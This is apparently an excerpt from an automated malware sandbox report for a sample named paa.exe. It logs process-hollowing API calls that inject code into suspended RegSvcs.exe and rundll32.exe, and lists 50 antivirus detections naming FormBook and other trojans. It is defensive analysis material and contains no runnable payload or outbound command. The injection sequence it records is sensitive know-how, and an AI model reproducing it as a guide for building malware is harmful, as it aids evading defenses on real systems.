CreateProcessInternalW July 28, 2022, 9:04 a.m.	thread_identifier: 2104 thread_handle: 0x000002d4 process_identifier: 2204 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002d8	1	1
NtGetContextThread July 28, 2022, 9:04 a.m.	thread_handle: 0x000002d4	1	0
NtAllocateVirtualMemory July 28, 2022, 9:04 a.m.	process_identifier: 2204 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d8	1	0
WriteProcessMemory July 28, 2022, 9:04 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÈº´ Í!¸LÍ!This program cannot be run in DOS mode. $À¶b×]×]×]J§]Ë×]J]×]J]×]Rich×]PEL»Cà ¸pÐ@Ð@.text8¶¸ ` base_address: 0x00400000 process_identifier: 2204 process_handle: 0x000002d8	1	1
WriteProcessMemory July 28, 2022, 9:04 a.m.	buffer: base_address: 0x00401000 process_identifier: 2204 process_handle: 0x000002d8	1	1
WriteProcessMemory July 28, 2022, 9:04 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2204 process_handle: 0x000002d8	1	1
NtSetContextThread July 28, 2022, 9:04 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4327536 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002d4 process_identifier: 2204	1	0
NtResumeThread July 28, 2022, 9:04 a.m.	thread_handle: 0x000002d4 suspend_count: 1 process_identifier: 2204	1	0
NtResumeThread July 28, 2022, 9:04 a.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 2776	1	0
CreateProcessInternalW July 28, 2022, 9:04 a.m.	thread_identifier: 2088 thread_handle: 0x000000a0 process_identifier: 2388 current_directory: filepath: C:\Windows\SysWOW64\rundll32.exe track: 1 command_line: filepath_r: C:\Windows\SysWOW64\rundll32.exe stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000000bc	1	1

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Lionic	Trojan.MSIL.Noon.l!c
Elastic	malicious (high confidence)
DrWeb	Trojan.PackedNET.1462
MicroWorld-eScan	Trojan.GenericKD.61040293
FireEye	Generic.mg.5582e1c745e77141
McAfee	Artemis!5582E1C745E7
Cylance	Unsafe
Sangfor	Trojan.Msil.Kryptik.Vc7r
K7AntiVirus	Trojan ( 005961dc1 )
Alibaba	Trojan:Win32/runner.ali1000123
K7GW	Trojan ( 005961dc1 )
BitDefenderTheta	Gen:NN.ZemsilF.34806.bn0@amkp3!j
Cyren	W32/MSIL_Agent.DPT.gen!Eldorado
Symantec	Scr.Malcode!gdn34
ESET-NOD32	Win32/Formbook.AA
TrendMicro-HouseCall	TROJ_GEN.R002H0CGQ22
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.MSIL.Crypt.gen
BitDefender	Trojan.GenericKD.61040293
Avast	Win32:PWSX-gen [Trj]
Tencent	Msil.Trojan.Crypt.Svre
Ad-Aware	Trojan.GenericKD.61040293
Emsisoft	Trojan.GenericKD.61040293 (B)
Comodo	Malware@#34gm2y3dyjdi8
VIPRE	Trojan.GenericKD.61040293
McAfee-GW-Edition	BehavesLike.Win32.Generic.tc
Trapmine	suspicious.low.ml.score
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Webroot	W32.Trojan.Gen
Avira	HEUR/AGEN.1202701
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Ransom.Win32.Sabsik.sa
Microsoft	TrojanSpy:Win32/Swotter.A!bit
GData	Trojan.GenericKD.61040293
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.PWSX-gen.C5214700
Acronis	suspicious
VBA32	CIL.HeapOverride.Heur
ALYac	Trojan.GenericKD.61040293
MAX	malware (ai score=88)
Malwarebytes	Trojan.MalPack.PNG.Generic
APEX	Malicious
Rising	Trojan.Generic/MSIL@AI.100 (RDM.MSIL:rEVpIyuHTVvfcvcoz4laFw)
Ikarus	Trojan-Spy.FormBook
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenKryptik.FVXS!tr
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/Chgt.AA
CrowdStrike	win/malicious_confidence_100% (W)

paa.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All